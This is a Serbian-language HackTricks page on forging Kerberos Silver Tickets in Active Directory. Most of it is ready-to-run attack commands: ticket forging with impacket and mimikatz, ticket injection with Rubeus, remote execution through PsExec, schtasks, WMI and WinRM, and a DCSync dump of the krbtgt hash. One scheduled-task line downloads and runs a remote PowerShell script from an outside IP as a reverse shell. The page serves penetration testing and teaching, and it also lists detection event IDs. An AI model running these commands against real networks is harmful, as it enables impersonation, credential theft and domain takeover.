Silver Ticket

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJATELJSTVO!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Savet za bug bounty: Prijavite se za Intigriti, premium platformu za bug bounty kreiranu od hakera, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!

Srebrna karta

Napad Srebrna karta uključuje iskorišćavanje servisnih karata u okruženjima Active Directory (AD). Ova metoda se oslanja na dobijanje NTLM heša servisnog naloga, kao što je nalog računara, kako bi se falsifikovala karta za uslugu dodeljivanja karata (TGS). Sa ovom falsifikovanom kartom, napadač može pristupiti određenim uslugama na mreži, predstavljajući se kao bilo koji korisnik, obično ciljajući administrativne privilegije. Naglašava se da je korišćenje AES ključeva za falsifikovanje karata sigurnije i manje detektovano.

Za izradu karata, koriste se različiti alati zavisno od operativnog sistema:

Na Linux-u

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Na Windows operativnom sistemu

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Dostupne usluge

Tip usluge	Srebrne karte usluga
WMI	HOST RPCSS
PowerShell udaljeno upravljanje	HOST HTTP Zavisno od OS-a takođe: WSMAN RPCSS
WinRM	HOST HTTP U nekim slučajevima možete samo zatražiti: WINRM
Planirani zadaci	HOST
Deljenje datoteka u sistemu Windows, takođe psexec	CIFS
LDAP operacije, uključujući DCSync	LDAP
Alati za udaljeno upravljanje serverom Windows	RPCSS LDAP CIFS
Zlatne karte	krbtgt

Tip usluge

Srebrne karte usluga

WMI

HOST

RPCSS

PowerShell udaljeno upravljanje

HOST

HTTP

Zavisno od OS-a takođe:

WSMAN

RPCSS

WinRM

HOST

HTTP

U nekim slučajevima možete samo zatražiti: WINRM

Planirani zadaci

HOST

Deljenje datoteka u sistemu Windows, takođe psexec

CIFS

LDAP operacije, uključujući DCSync

LDAP

Alati za udaljeno upravljanje serverom Windows

RPCSS

LDAP

CIFS

Zlatne karte

krbtgt

Korišćenjem Rubeus-a možete zatražiti sve ove karte korišćenjem parametra:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Događaji ID-ova srebrnih karata

4624: Prijava na nalog
4634: Odjava sa naloga
4672: Prijava administratora

Zloupotreba karata usluga

U sledećim primerima zamislimo da je karta dobijena predstavljajući se kao administratorski nalog.

CIFS

Sa ovom kartom moći ćete pristupiti fasciklama C$ i ADMIN$ putem SMB (ako su izložene) i kopirati datoteke na deo udaljenog fajl sistema samo radeći nešto poput:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

HOST

Sa ovlašćenjem možete generisati zakazane zadatke na udaljenim računarima i izvršavati proizvoljne komande:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

Sa ovim kartama možete izvršiti WMI na sistemu žrtve:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

HOST + WSMAN (WINRM)

Sa pristupom winrm preko računara možete pristupiti i čak dobiti PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Proverite sledeću stranicu da biste saznali više načina za povezivanje sa udaljenim hostom pomoću winrm:

pageWinRM

Imajte na umu da winrm mora biti aktivan i osluškivan na udaljenom računaru da biste mu pristupili.

LDAP

Sa ovim privilegijama možete iskopati bazu podataka DC-a koristeći DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Saznajte više o DCSync na sledećoj stranici:

Reference

pageDCSync

Bug bounty savet: Prijavite se za Intigriti, premium platformu za bug bounty kreiranu od hakera, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!

Naučite AWS hakovanje od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousSID-History Injection NextSkeleton Key

Last updated 1 month ago